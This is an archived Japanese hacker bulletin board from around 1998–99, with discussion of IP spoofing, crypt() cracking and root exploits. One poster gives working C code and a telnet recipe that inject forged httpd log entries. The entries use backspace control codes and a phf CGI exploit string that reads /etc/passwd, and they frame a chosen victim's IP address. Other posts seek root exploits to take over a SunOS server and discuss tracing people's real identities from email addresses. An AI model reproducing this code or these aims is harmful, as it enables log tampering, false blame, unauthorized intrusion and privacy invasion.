| 【メッセージ】 >メール送りました>うにゅんさん レスしましたので〜 あとは、closedってことで。 >今、win95/98ターゲットにしたIp Spoofingツール作ってます。 私は忙しさのあまり、勢いが... やっぱ寒さはコタえます(謎) >それから、一番有名なrootshellは、uidとgidを共に0にして >shellを立ち上げるプログラムでしょう。 そういう意味なら、/bin/shが一番有名かも(笑) これだと、コンパイルえら〜に悩まされずに済みます(爆) >なんか掲示板形式がころころ変わるのは何故? あまり気にしないでください。 あ、でもアレなら表示形式をGuestBook固定にしましょうか?>みなさん |
| 【名 前】root. 【タイトル】ども 01/08 15:21 |
root.@iname.com |
| 【メッセージ】 メール送りました>うにゅんさん 誰だか判明してもちょっとだけ秘密にしててください。 で、半角アスタリスク使えないんですね、失礼しました。 きちんと訂正してくれている所がさすがですねぇ。。 ちなみにこれはBugTraqが元ネタです。 やっぱこういうわかりやすいのがいいですね(笑) 今、win95/98ターゲットにしたIp Spoofingツール作ってます。 テストがうまくいったら載せようかな。 いまいちSEQの法則がわからんなぁ。UNIXはもっとわからん(笑) どうも秒数ぽいですけどね>Win それから、一番有名なrootshellは、uidとgidを共に0にして shellを立ち上げるプログラムでしょう。 10行くらいでかけると思いますよ(笑) #なんか掲示板形式がころころ変わるのは何故? |
| 【名 前】うにゅん 【タイトル】re:(1)教えて〜 01/07 21:43 |
unewn4th@usa.net |
| 【メッセージ】 >一般ユーザーからRootになるためのプログラムはどんなものが有名でしょうか? う〜ん、どれが有名って言うと... どれも有名です。 一般的には、overflow-exploitが多いですね。 >かならず何らかのエラーが出ます。 普通、必ずエラーということはないですよ。gccはちゃんと 動いてるんですか? どんなエラーがでるのか、書いてください。 |
| 【名 前】うにゅん 【タイトル】re:(1)ついでにもう1つ 01/07 21:37 |
unewn4th@usa.net |
| 【メッセージ】 あ、それと、このレンタル掲示板ですが、半角*(アスタリスク) がダメなんです。だから、掲載してもらったプログラムは、ポインタ 関連がエラーになっちゃって、そのままじゃコンパイルできません。 で、みなさん以下の部分を変更してコンパイルしましょう。 ただし、全部半角小文字にしてくださいね。 1行目 (誤)include <stdio.h> (正)#include <stdio.h> これはペーストミスですね(笑) 19行目 (誤)char mon_[] = (正)char *mon_[] = 28行目 (誤)struct tm tmbuf; (正)struct tm *tmbuf; ログをcatで確認してみましたが、たしかに見えませんね。 あと、system/V系を使ってる人でip.hでエラーが出る人は削除 しましょう。 ちなみに、こういうモンの張り付けは、大歓迎ですので、みなさん もバンバンやってくださいね〜 >私と共同で裏掲示板やりませんか? >表でかけない事も多いですし。 う〜ん、私はとっくの昔にヤバいことはやめたので、 書くようなネタはナイですよ〜。あ、でも昔のはある意味もっと 書けませんけど(苦笑) でも、興味ありますね〜。具体的な内容をメルしてくらさい。 |
| 【名 前】うにゅん 【タイトル】re:(1)HTTPDのログの消し方 01/07 21:06 |
unewn4th@usa.net |
| 【メッセージ】 はじめまして、rootさん。 コレは面白ですね。たしかに、httpのログは膨大なのでgrep とかで検査する場合が多いですから、そういう場合はばっちり ですね。わざわざ「侵入」しなくてもいいわけですし。 vi等でログチェックしてる場合はばれちゃうというのが難点ですが... |
| 【名 前】root. 【タイトル】あ 01/07 18:56 |
root.@iname.com |
| 【メッセージ】 下の"tcp_org.h"はnetinet/tcp.hでいいです。 エラーでたらtcp.hの#ifdef削ってth_なんちゃらが 自動的に有効になるようにしてください。 turboならそのままいけるはず。 これコンパイルできます?>HAEさん わたしはredhatで作りましたんで。 |
| 【名 前】root. 【タイトル】偽httpdログを追加するツール作成(とりあえず) 01/07 18:54 |
root.@iname.com |
| 【メッセージ】 include <stdio.h> #include <stdlib.h> #include <string.h> #include <netdb.h> #include <time.h> #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <netinet/ip.h> #include "tcp_org.h" #include <netinet/in_systm.h> #include <arpa/inet.h> #define PUT_METHOD "GET /cgi-bin/phf?Qalias=x%0d%0a/bin/cat%20/etc/passwd" #define REQ_VER "HTTP/1.0" #define JISA "+0900" char mon_[] = { "Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug", "Sep", "Oct", "Nov", "Dec" }; int main( int argc, char argv[] ) { char tmp_buffer[256], fuck_bs[256]; int sock_send, loop; long t; struct sockaddr_in addr; struct tm tmbuf; if( argc != 3 ) { printf( "Usage: %s <target ip_addr> <www server>\n", argv[0] ); exit( -1 ); } if( ( sock_send = socket( AF_INET, SOCK_STREAM, 0 ) ) == -1 ) { perror( "socket" ); exit( -1 ); } memset( &addr, 0, sizeof( struct sockaddr_in ) ); addr.sin_family = AF_INET; addr.sin_port = htons( 80 ); addr.sin_addr.s_addr = inet_addr( argv[2] ); if( addr.sin_addr.s_addr == -1 || inet_addr( argv[1] ) == -1 ) { fprintf( stderr, "Use Ip address(...)...\n" ); exit( -1 ); } if( connect( sock_send, &addr, sizeof( addr ) ) == -1 ) { perror( "connect" ); exit( -1 ); } t = time( 0 ); tmbuf = localtime( &t ); for( loop = 0; loop < 255; loop++ ) fuck_bs[ loop ] = 0x08; fuck_bs[255] = '\0'; sprintf( tmp_buffer, "%s%s - - [%02d/%s/%04d:%02d:%02d:%02d %s] \"%s %s", fuck_bs, argv[1], tmbuf->tm_mday, mon_[tmbuf->tm_mon], tmbuf->tm_year + 1900, tmbuf->tm_hour, tmbuf->tm_min, tmbuf->tm_sec, JISA, PUT_METHOD, REQ_VER ); if( send( sock_send, tmp_buffer, strlen( tmp_buffer ), 0 ) == -1 ) { perror( "send" ); exit( -1 ); } fprintf( stderr, " SUCCESS \n" ); exit( 0 ); } |
| 【名 前】HAE 【タイトル】教えて〜 01/07 18:30 |
|
| 【メッセージ】 質問です〜 一般ユーザーからRootになるためのプログラムはどんなものが有名でしょうか? 一応自分なりにさがして(rootshell.comとか)コンパイルしようとするんですけど うまくいきません。 かならず何らかのエラーが出ます。 ふつうに gcc -o ファイル名 コンパイルするファイル名 gcc コンパイルするファイル名 で成功しません。 多少Cの理解力はありますがさすがにUNIX-Cはほとんどわかりません。 一応printf("HOHOHO")程度ならコンパイル成功するみたいですけど。(^^; 自分のLinux(Turbi Linux3.0 ,Redhat の2つ) どっちも成功しません。 これが成功すれば本来の標的の Sun Microsystems Inc. SunOS 5.5 にアカウントがあるので(コンパイラとかの制限なし^^;) ここを攻め落としたいのですが・・・(^^; だれか教えてください。 絶対にコンパイルエラーにならないrootshellが欲しいです。 パーミッションに関係なくファイルの中身がみれるcatコマンドもどき すらできません。 |
| 【名 前】root. 【タイトル】ついでにもう1つ 01/07 17:28 |
root.@iname.com |
| 【メッセージ】 telnet target.com 80 Connected to 1.0.0.1. Escape character is '^]'. ^H^H^H^H^H^H^H^H(たくさん)^H^H^H^H^H^H^Hムカツク奴のipアドレス - - [適当な日付 +0900] "GET /cgi-bin/phf?Qalias=なんちゃら HTTP/1.0" 0 1 [cr][cr] このリクエストでムカツク奴を攻撃することが出来ます(笑) まぁログ追加のようなものですね。 エラーログの方にも同じログが追加されるのでちょっと不自然かも しれませんが、、、 ところでうにゅんさん。 私と共同で裏掲示板やりませんか? 表でかけない事も多いですし、 私の作った掲示板は結構固いです。 有名な人呼べるので、ぜひどうでしょう? ではでは。 |
| 【名 前】root. 【タイトル】HTTPDのログの消し方 01/07 17:21 |
root.@iname.com |
| 【メッセージ】 HTTPのリクエストメソッドがありますね。 例えば GET / HTTP/1.0[CR][CR] こういうやつです。 これはログに、 IPアドレス - - [日付] "GET / HTTP/1.0" と出ます。 リクエストに使われる文字列には、実はコントロールコードを 使用する事が可能です。 コントロールコードとは、^Cなんかのヤツね。 では、以下のリクエストはどうなるでしょう。 GET ^H^H^H^H^H^H^H(適度に)^H^H^H^H^H^H/ HTTP/1.0 ^Hはバックスペースのコードで、これが画面に表示されると 1文字消えるわけです。 ちなみに上のリクエストのログは / HTTP/1.0" こんなカンジになるような気がします。 まぁこういうコードに対応してない端末で見られたら終わりですけど。 |
| 【名 前】P&A 【タイトル】遅れましたが・・・あけましておめでとうございます 01/06 00:22 |
butsuri@anet.ne.jphttp://www.cool.ne.jp/light/ |
| 【メッセージ】 あけましておめでとうございます。 今年もROMになりそうですが、よろしくお願いします。 石川五右衛門の完成楽しみにしていますので・・・ |
| 【名 前】Hariru 【タイトル】re:(1)cryptの平文変換って 01/06 00:04 |
hariru@ami.602.cc |
| 【メッセージ】 >アレbase64じゃありませんでしたか? う〜ん。実はまだ暗号全般に関して調べ尽くせていないので、どうともいえないです。 ただ、base64は電子メールでメッセージ等を送る際に、 メッセージを可視コード化するのもでしたよね。どうやってかはまだ知りませんけど。 それに可視コード化された文字は、次の "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" の64文字と終了Pad(Padding)に使われる"="から成り立っていたはずで、 今回取り上げた通常UNIXのloginなどで使われているやつと違うと思います。 >ちなみにjohnはその変換をせずに見比べていたような。 ちなみに、私にはjohnのソースがごちゃごちゃしているため、 流れさえ理解できないっす(笑い) |
| 【名 前】reverse 【タイトル】おめでとうございます 01/05 01:14 |
esrever@usa.nethttp://members.tripod.com/~reverse/ |
| 【メッセージ】 こんにちわ、今年もよろしくお願いいたします。 以前、話題になったip spoofについてドキュメントなんぞ書いてみました。 英文のドキュメントのほうが、やっぱり勉強になります。 英文、嫌いですが... |
| 【名 前】S 【タイトル】LINKさんくすです 01/05 00:07 |
http://members.tripod.com/~cleangear/index.html |
| 【メッセージ】 あけましておめでおうございます。 うにゅんさま、りんく、ありがとうございます。 私のようなへっぽこなページにリンクしていただけるなんて たいへんうれしいです。 これからもよろしくお願いします。 |
| 【名 前】White_E 【タイトル】謹賀新年 01/04 23:19 |
w_e@geocities.com |
| 【メッセージ】 昨年同様、うにゅん氏から色々と刺激を受けたいと思います。 今年も宜しく。 |
| 【名 前】hil 【タイトル】そうそう 01/04 21:58 |
nobody@www.hil.ntt.co.jphttp://www.hil.ntt.co.jp |
| 【メッセージ】 いつぞやの並列云々の話ですけど いろんなISPとか大学のマシンとか使って 並列でガリガリ照合するサーバプログラムにすれば スピードは上がるっていう意味あいだったんです。 つまんないネタでごめんね。わはは |
| 【名 前】MCI 【タイトル】cryptの平文変換って 01/04 21:55 |
nobody@mci.nethttp://www.mci.net |
| 【メッセージ】 アレbase64じゃありませんでしたか? ちなみにjohnはその変換をせずに見比べていたような。 小さなところからコツコツと。 |
| 【名 前】SigmaLoop 【タイトル】賀正 01/04 06:54 |
sigma@cyberjunkie.comhttp://www.geocities.com/Tokyo/Dojo/4824/ryo.html |
| 【メッセージ】 新年開けましておめでとうございます。 99年は石川五右衛門の完成という記念すべき年になるんでしょうね。 ROMばっかりで何らお手伝いしておりませんが今年もよろしくお願い します_(._.)_。 |
| 【名 前】int ZER0 【タイトル】挨拶が遅れましたが 01/04 02:45 |
intzer0@usa.net |
| 【メッセージ】 明けましておめでとうございます。 ROMメインになりそうですが、今年もよろしくお願い致します。 私は失礼な発言が無いように、そしてスキルの向上ができるように がんばろうと思います。 |
| 【名 前】Rorrim 【タイトル】遅れ馳せながら... 01/03 13:35 |
49-hack@ijk.com |
| 【メッセージ】 明けましておめでとうございます。 何故か学校に来て一人ぼっちです。 (当たり前か...) 今年は、卒業して、卒業旅行して...と 色々殺りたい事ばっかり思い馳せながら、卒論してます。 卒論終わったら、金沢へ旅行するぞ〜〜〜! (元旦早々、彼女の整理が来て安心なRorrimでした) |
| 【名 前】AC 【タイトル】あいさつ 01/03 10:22 |
Suzume-Sakurajyousui@CyberTeam.vip.co.jphttp://www.geocities.com/Vienna/Choir/3980/ |
| 【メッセージ】 菌が信念・・・じゃなくて謹賀新年です。 最近すっかり活動してないです。 コマッタ物です。 では。 |
| 【名 前】斑の紐 【タイトル】WANTED! 賞金首 01/03 03:38 |
Speckled-Band@neti.comhttp://www.geocities.co.jp/SiliconValley-PaloAlto/5497/ |
| 【メッセージ】 明けましておめでとうございます。 以前このBBSにある個人の情報を探り出して欲しいとご相談させて 頂きました『斑の紐』です。 状況がややこしく、こちらにもご迷惑をかけてしまうので、この問題 専用のHPを開設致しました。 ご協力頂ける方は、ぜひご覧下さいませ。 お礼も用意させて頂いております。どうぞよろしくお願い申し上げます。 |
| 【名 前】Juanita 【タイトル】ご挨拶; 01/02 11:18 |
happynewyear@juanita.addr.comhttp://juanita.addr.com/ |
| 【メッセージ】 明けましておめでとうございます。 今年は昨年以上にROMります(笑 で、つっこめるネタがあれば提供 します(なじょ |
| 【名 前】四苦八苦 【タイトル】ども 01/02 08:24 |
|
| 【メッセージ】 新年明けましておめでとうございます。 去年はスキル不足で何もお役にたてませんでしたが、今年もよろしくおねがいします。 |
| 【名 前】BEAMZ 【タイトル】新年 01/02 05:29 |
http://sourceofkaos.com/homes/haru/ |
| 【メッセージ】 新年明けましておめでとう御座います。 最近マシンの画面を見ていると頭痛が激しいです。 ついでに鼻血も出てきました いや・・、関係ないんでしょうけど何故か不安な今日このごろです(笑い と、まあ今年も又、宜しくお願い致します。 |
| 【名 前】ロリロリ 【タイトル】初おしえて 01/02 03:35 |
|
| 【メッセージ】 netstatごまかす方法知りたいでーす。 @reverseさん >例のipspoofってやつのドキュメントみたいなのを書いてます。 ありがとおございますぅ(ワーイ) |
| 【名 前】blue3 【タイトル】sneakers 01/02 00:57 |
|
| 【メッセージ】 明けましておめでとうございます。 ローカル情報かもしれませんが、 TVで1月2日 AM1時くらい(今日)から映画「スニーカーズ」 やるみたいです。 |
| 【名 前】うにゅん 【タイトル】うへ〜 01/01 17:10 |
unewn4th@usa.net |
| 【メッセージ】 あけましておめでとうございます。 去年は9/18からスタートして、約2万アクセス... 今年もがんばりますので、みなさんよろしくね〜 |
| 【名 前】k00L 【タイトル】謹賀新年 01/01 10:17 |
info@backsection.comhttp://backsection.com |
| 【メッセージ】 明けましておめでとうございます。 旧年中はいろいろお世話になりました。 本年もよろしくお願い致します。 BACKSECTION.COM k00L @メールアドレスから個人情報の件 意図がわかりません。 余程の事情がおありでしょうが、荒らしですら逮捕される中、 警察が動かないと言うのは、つまり、 事件性が薄い、証拠不充分という事になります。 関連ログ、ISP、メアドがわかってるのに証拠不充分はおかしな話し。 つまり事件性が薄いということでしょう。 詐欺、荒らし、脅迫、HPの書き換えなどのクラック行為 その他ハックされた。。なら確実に警察は動きます。 また逆に考えるとハックされた、荒らされたとしたらその相手の 本アドを掴むと言うのは相当なスキルが要求されるはずです。 でもあなたはその本アドを知っていると言う。 しかし警察などは動いてくれない・・・? ちょっと不自然ですね。 個人的に怨みを持っただけではないですか? もしくは単にメアドから個人情報を調べる方法を知りたいだけかな?(^^;; 復讐がしたいのならお金払えば調べてくれるところは たくさんあるのでそこで調べてもらったらいかがでしょうか。 メアドから本名調べるのはSMTP見ればいいでしょう。 それ以上の個人情報調べたかったら専門の探偵でも雇う事です。 ちなみにISPの個人情報が入ったサーバーは 最近はネットから切り離されていることがほとんどなので、 そのような場合は当然ネットから侵入できません。 またできるとしても、最近の大手ISPは私も含め素人に手が出るような代物では有りません。 生兵法で侵入したとしても、速攻でTraceされてヘタしたら莫大な賠償金を請求されて一家離散ですよ。 PS/詳しい状況がわからないので憶測で書きましたことをお詫びします。 |
| 【名 前】Hariru 【タイトル】あけましておめでと 01/01 02:00 |
hariru@ami.602.cc |
| 【メッセージ】 1999年、あけましておめでとうございます。 まだまだスキル足りない私ですが、 今年もいろいろ勉強させてもらうつもりですので、よろしくお願いま〜す。 メールアドレスから本名を特定する件ですが、 たしかハッカージャパンのVol.1に載っていましたよね。 でも、あれってプロバイダによってできたりできなかったりしますし、 しかもそれが本当の本名なのかもわからないような気がしますけど。 となると、斑の紐さんが望んでいるような個人情報を得るには、 やはり相手のISPへの進入か、ISP側へ苦情を言って聞き出すか、 あるいは社会工学を駆使して聞き出すぐらいしかないような気がします。 まだほかの方法がありそうな気がしますが、これ以外は私には思い浮かびません。 ただ、ISPへの進入だけはあまりおすすめできませんけど。 |
| 【名 前】SkyDolphin 【タイトル】無題 12/31 23:13 |
sdolphin@anet.ne.jp |
| 【メッセージ】 > 弁護士&警察には相談したのですが、裁判所の要請を取るには少々 > 難があるようなのです。 そういった相談が出来たのであれば、もし貴方自身が被害を被ったのであれば 刑事事件として名誉毀損で訴えを出して、民事で損害賠償請求できると思いま すが。訴訟まで行かなくても、和解でもしたければ公正証書の作成でもしてし て損害賠償として差押さえできます。 #人物の特定で出来たらの話ですよ それから刑事として訴えてほしくなければ公正証書作成受託しろって言うのもあり でしょう。脅しはダメですが・・・ |
| 【名 前】b1ue3 【タイトル】re:(2)ふむ... 12/31 15:52 |
|
| 【メッセージ】 あ、expn と vrfy のことですか・・・。 忘れてました。 |
| 【名 前】SigmaLoop 【タイトル】Res 12/31 06:39 |
sigma@cyberjunkie.comhttp://www.geocities.com/Tokyo/Dojo/4824/ryo.html |
| 【メッセージ】 普段はROM専門のSigmaLoopと申します。 @斑の紐さん >弁護士&警察には相談したのですが、裁判所の要請を取るには少々 >難があるようなのです。 止むに止まれぬ事情がおありの様ですが、自称サイバーポリスの警 察が自主的に動かない様な事情ですと、ISPから正当な手順でその 人物の情報を得る事は難しいかと思います。 「荒し」や「画像貼り付け」(尤もこれは男性が女性の掲示板に猥 褻画像ほ貼ったそうですが)などは既に逮捕例や判例が存在します ので、それを適用するように訴えかければいいのですが……。 @みなさん それでは良いお年を_(._.)_。 |
| 【名 前】SkyDolphin 【タイトル】メルアド 12/31 05:54 |
sdolphin@anet.ne.jp |
| 【メッセージ】 メルアドから本名取得・・・・ たしかSMTPから取れるんでしたよね。 何度かやったことありますよ。成功、失敗は別として(笑 #今更ですが、はじめまして #時々見させていただいてます。よく分かりませんけど(笑 |
| 【名 前】b1ue3 【タイトル】re:(1)ふむ... 12/31 03:44 |
|
| 【メッセージ】 おひさしぶりです。 横から割り込んですみません。 >実名ぐらいなら簡単ですよ そうなんですか! 是非おしえてもらいたいです。 |
| 【名 前】Rorrim 【タイトル】ふむ... 12/31 03:28 |
49-hack@ijk.com |
| 【メッセージ】 >斑の紐さん 本アドってメールアドレスの事? 個人情報とはどこまでの情報でしょうか? 実名ぐらいなら簡単ですよ でも現住所、TEL番号等までとなると 相手のISPへの侵入が不可欠ですので... 犯罪行為はちょっとネ(笑) |
| 【名 前】斑の紐 【タイトル】お願い 12/30 17:53 |
Speckled−Band@neti.com |
| 【メッセージ】 突然で申し訳ありませんが、リモホや本アドから個人情報を 調べて下さる方をどなたかご存知ありませんか? アクセス記録も揃ってはいます。どこのプロバかも分かってはいます。 でも当方は素人なので、それ以上調べる事が出来ませんでした。 ここに書きこむには場違い内容かもしれませんが、止むに止まれぬ 事情がありまして・・・。 もちろん、ご協力下さった方には出来る限りのお礼を差し上げるつもり です。 弁護士&警察には相談したのですが、裁判所の要請を取るには少々 難があるようなのです。 お心当たりのある方はどうかご検討頂けないでしょうか? よろしくお願い申し上げます。 |
| 【名 前】reverse 【タイトル】re:(1)RAW 12/30 01:08 |
esrever@usa.nethttp://members.tripod.com/~reverse/ |
| 【メッセージ】 でもやっぱりtcpですよね。 例のipspoofってやつのドキュメントみたいなのを書いてます。 肝心のシーケンス番号予測部分も、だいたい分かりました。 難しいですね。ううむ。 |
| 【名 前】ロリロリ 【タイトル】RAW 12/29 04:38 |
|
| 【メッセージ】 iphdr, tcphdr, udphdr という構造体があるのはわかりました^^ UDPなら簡単にできそおです。 #juanitaさんこんにちわ(萌え萌え〜) |
| 【名 前】トオル 【タイトル】了解です〜 12/28 20:43 |
|
| 【メッセージ】 完了〜. |
| 【名 前】うにゅん 【タイトル】crypt()れしぴ 12/28 16:16 |
unewn4th@usa.net |
| 【メッセージ】 Penguin Document No.13に「crypt()レシピ」を追加しました。 Hariruさんの暗号関連ドキュメントの第2段です。crypt()の 原理について詳しく解説されています。 Hariruさんもイロイロ大変でしょうけど、これからもよろしく お願いしますね。 私も、年明けから睡眠時間削ってがんばります... トオルさん、更新よろしくね。 |
| 【名 前】うにゅん 【タイトル】re:(1)あ 12/28 16:03 |
unewn4th@usa.net |
| 【メッセージ】 >気づかないうちに590MBになってました(ワライ そうやって、飛びそうになった人が何人かいるようです(笑) やっぱ、チェック入れたら警告かなんか出るようにしないとね... みんなマニュアルなんて後で読むだろうし(笑) あ、それとここで宣伝しちゃお 知ってるヒトもたくさんいると思いますけど、BAckSEctionが backsection.zeroとしてリニューアルです。そんで、新しく backsection.comがスタートします。 最初は柔らかいネタからスタートしますが、だんだんアレな 内容になっていく予定です。よろしくね〜 |
| 【名 前】うにゅん 【タイトル】re:(1)こんばんは 12/28 15:58 |
unewn4th@usa.net |
| 【メッセージ】 >初めて書き込み致します。 >パケットネタが盛んですね。 >ちょくちょく寄らせて頂きます。 おや、Juanitaさん、はじめまして。 ちょくちょくROMらせてもらってます(笑) よろしく〜 |
| 【名 前】K00L 【タイトル】あ 12/27 16:46 |
webmaster@backsection.comhttp://backsection.com |
| 【メッセージ】 juanitaさん発見(ワライ >うにゅん師 五右衛門で「クラック結果をファイルに保存」にチェックしてたら 気づかないうちに590MBになってました(ワライ HD飛びそうです(汗) |
| 【名 前】Juanita 【タイトル】こんばんは 12/27 13:59 |
solaris@juanita.addr.comhttp://juanita.addr.com/ |
| 【メッセージ】 初めて書き込み致します。 パケットネタが盛んですね。 ちょくちょく寄らせて頂きます。 |
| 【名 前】うにゅん 【タイトル】re:(1)crypt()ドキュメント 12/26 20:20 |
unewn4th@usa.net |
| 【メッセージ】 >crypt()のドキュメントが完成しましたので、メールで送らせていただきます。 >確認してくださいませ。>うにゅんさん おぉ!ありがとうございます。 かなりインサイドでPGにはうれしいドキュですね〜 さすが暗号関連係(笑)のHariruさんです。 サラっと読んだだけなので、今晩にでも詳しく読んでみます。 明日掲載させて頂きますです。 |
| 【名 前】Hariru 【タイトル】crypt()ドキュメント 12/26 00:30 |
hariru@ami.602.cc |
| 【メッセージ】 crypt()のドキュメントが完成しましたので、メールで送らせていただきます。 確認してくださいませ。>うにゅんさん それにしても、cryptネタといっても結構幅広いみたいで、 どの辺から手を着けたらよいのか迷いますね。 とりあえず次の目標はMD5です。 しかし、卒業論文を後2週間ちょっとで完成させなければいけないので、 しばらくは打ち止めですね。 |
| 【名 前】ロリロリ 【タイトル】re:(2)>reverseさん 12/25 03:57 |
|
| 【メッセージ】 用途はそうです、より強力な匿名性ですね (^v^ WinSockのローカルアプリで作れれば理想的ですが、、 基本的にハック済みのIP鯖(とでも言っておきます)が 必要になるんでしたっけ? UDPのパケット中継してTCPで送りつけるプロクシとかも できたらいいなあって思ってます。 >#syslogとか え〜と、、syslogのことはよくわからないんですが、 どういう意味でちゅか? >ストレートな名前 かわいらしくていかがわしいのでとても気に入ってま〜す。 |
| 【名 前】reversr 【タイトル】re:(1)>reverseさん 12/24 19:37 |
esrever@usa.nethttp://members.tripod.com/~reverse/ |
| 【メッセージ】 >JavaのSocketは使えるんですが 基本は同じじゃないですか。なんとかなります! >HTTPに応用したいんで IP+TCP+HTTPパケットの偽造ですか? HTTPは認証もないですし、わりと簡単かも...とか言ってみたりして。 ちなみに、どのような用途に? CGI書き込みですか? >シーケンス番号も・・・で シーケンス番号の予想は、結構な確立であたるようです。 パケットを見たところ、rコマンドがバシバシ実行出来てましたから。 ただローカル環境ですから、現実に運用しているサーバーとなると話しは違ってくるとは思いますが。 とりあえずシーケンス番号のないUDPから取り掛かるのも良いかもしれませんね。 #syslogとか >よろしくおねがいします。 こちらこそ。ところで、ストレートな名前ですね(笑)。そうなんですか? ^^;;;; |
| 【名 前】うにゅん 【タイトル】re:(1)移転しました 12/24 17:20 |
unewn4th@usa.net |
| 【メッセージ】 >五右衛門完成したらウチにも置かせてください(爆) OKですよ〜 >それから読み物書いてください。ネタ不足です。 それは、もちろんOKです。 あ、でも"表現"まずい所あると思いますので、その辺は 適当に修正orボカシしてくださいね。 >お礼はGーGRIDでダメですか?POTENZA派?(笑) >それか車高調取り付けに行きます(汗) Sタイヤがいいっす。 あしは今ので結構気に入ってるので、できればスペアエンジンと スペアボディー(一式)ください(爆) でも、ウチのガメラ君、もうすぐ引退するかも... |
| 【名 前】K00L 【タイトル】移転しました 12/24 13:30 |
webmaster@backsection.office.ne.jphttp://backsection.com |
| 【メッセージ】 悪い子ツール満載です(笑) >うにゅんさん 五右衛門完成したらウチにも置かせてください(爆) それから読み物書いてください。ネタ不足です。 お礼はGーGRIDでダメですか?POTENZA派?(笑) それか車高調取り付けに行きます(汗) |
| 【名 前】ロリロリ 【タイトル】>reverseさん 12/24 01:48 |
|
| 【メッセージ】 >パケット作成ライブラリみたいです。ご参考までに ありがとうがざいますう。 JavaのSocketは使えるんですが Cは基本の部分で「ううぅ」ですし HTTPに応用したいんでシーケンス番号も・・・で なんかすごい時間かかりそぉですが よろしくおねがいします。 |
| 【名 前】Hariru 【タイトル】カキコできたので、もう一つ 12/23 23:56 |
hariru@ami.602.cc |
| 【メッセージ】 やっぱり文字制限ですかね。 registerの件はありがとうございます。 ちょっとベンチの仕方がよくわかりませんが、 速くなるのならregisterを入れたやつを使いますね。 でもCPUレジスタって、汎用レジスタのGR0〜GR4のこと意味するんですかね? だったら5つしかないってことですけど。 |
| 【名 前】Hariru 【タイトル】あれ? 12/23 23:52 |
hariru@ami.602.cc |
| 【メッセージ】 あれ?次に打ち込んだのもカキコできなかった。 もしかして、ここって文字制限とかあるんですか? とりあえず短くカキコしてみます。 "arch.h"の件は私の勘違いだったようです。(反省) findしてみたら、ちゃんとありました。 私の確認不足でお騒がせしてすみませんでした。 |
| 【名 前】Hariru 【タイトル】カキコができない 12/23 23:41 |
hariru@ami.602.cc |
| 【メッセージ】 う〜ん。なぜだかカキコができない。 どうしてでしょう? |
| 【名 前】hsj 【タイトル】むむ 12/23 22:47 |
hsj@geocities.co.jp |
| 【メッセージ】 ROMに入るとか言っといて何ですが(笑) >クライアントにもサーバにもなるんですよね? はい、一応・・・。 >だったら、踏み台にできますね。 なるほど。たとえログ無しで入れるとしても踏み台経由で行く慎重さが重要なのですね。 その踏み台もログ無しにできると考えると少しは意味が有るかな? >よかったら、成功談等お話ししましょう。 実はreverseさんのテキストも期待してます。 イヤ、ボードROMってるもんで・・・ってここに書くもんじゃないですね(汗) 失礼しました>UNYUNさん |
| 【名 前】reverse 【タイトル】re:(3)ステルスとか・・ 12/23 20:57 |
esrever@usa.nethttp://members.tripod.com/~reverse/ |
| 【メッセージ】 パケット作成ライブラリみたいです。ご参考までに 蛇足ですがudp&tcp/ipの知識は必須かと思います。unix系の雑誌でたまに特集してます。 http://www.genocide2600.com/~tattooman/utility-unix/spak-0.6b.tar.gz ipspoofingですが、最近ちょっとやりはじめました。 よかったら、成功談等お話ししましょう。 ちなみに、私の方はw0rmさんの所のipspoofプログラムが動作した、ぐらいです収穫は。 |
| 【名 前】int ZER0 【タイトル】re:(4)registerって? 12/23 12:31 |
intzer0@usa.net |
| 【メッセージ】 >>ところで<arch.h>はどういう類のヘッダなのでしょうか? >john固有のヘッダです。 >詳しくはMakefileを参照してください。 大変失礼しました。 include行をよく見れば、<arch.h>ではなく、"arch.h"でしたね。 注意が足りませんでした。(この種のミスは二度目...) 深く反省します。(ハズカシー) archってCPUのarchitectureの事だったんですね。 |
| 【名 前】ロリロリ 【タイトル】re:(4)ステルスとか・・ 12/23 00:32 |
|
| 【メッセージ】 >ステルススキャンに関しては、一応テキストを書く予定ですので、 期待してま〜す。 ついでにspoofingもおねがいしまっす。 |
| 【名 前】うにゅん 【タイトル】re:(1)arch.h 12/22 22:55 |
unewn4th@usa.net |
| 【メッセージ】 >tdmを別tdmのclientになるようにしてみた。 <−意味はあるのか?(笑) クライアントにもサーバにもなるんですよね? だったら、踏み台にできますね。 >現在、RootShellで拾ってきたIpSpoof.txtをがんばって読んでるところです。 いい読み物ですよね。 >つくづく英語力の有る方が羨ましいです(笑) UGの人は、こうやって英語慣れする人も多いらしいです(笑) |
| 【名 前】hsj 【タイトル】ああ、 12/22 22:25 |
hsj@geocities.co.jp |
| 【メッセージ】 うにゅんさんとカブっちゃった・・・ |
| 【名 前】hsj 【タイトル】arch.h 12/22 22:23 |
hsj@geocities.co.jp |
| 【メッセージ】 おひさしぶりのhsjです。 arch.hですが、Makefileが賢いみたいですね。 システムによって別のヘッダをlnやらcpやらしているようです。 近況: tdmを別tdmのclientになるようにしてみた。 <−意味はあるのか?(笑) 一応動いている模様(笑) ipspoofingに手を出しはじめた。 ハッカージャパンを読んでってワケではないですが・・・。 かなり前にw0rmさんの所で見かけて気になってはいたけど、trustすら よくわかってなかったヒヨコちゃんだったので(今でもヒヨコですが(笑))、 後まわしにしてました。 現在、RootShellで拾ってきたIpSpoof.txtをがんばって読んでるところです。 つくづく英語力の有る方が羨ましいです(笑) (でもこのテキスト、アタックの原理の説明でIpSpoofそのものの説明じゃないみたい?) なので、 >ステルススキャンに関しては、一応テキストを書く予定ですので、 期待してます。 長々とお邪魔しました。 それではまたROMに入ります(笑) |
| 【名 前】うにゅん 【タイトル】re:(3)registerって? 12/22 22:20 |
unewn4th@usa.net |
| 【メッセージ】 >VC++ではレジスタは使えないんですね。Microsoft 固有の仕様(笑) あれ?そうでしたっけ? 色んなコンパイラと色んなOS使ってるから、ぐっちゃになったかも しれません。 >ところで<arch.h>はどういう類のヘッダなのでしょうか? john固有のヘッダです。 詳しくはMakefileを参照してください。 |
| 【名 前】int ZER0 【タイトル】re:(2)registerって? 12/22 21:20 |
intzer0@usa.net |
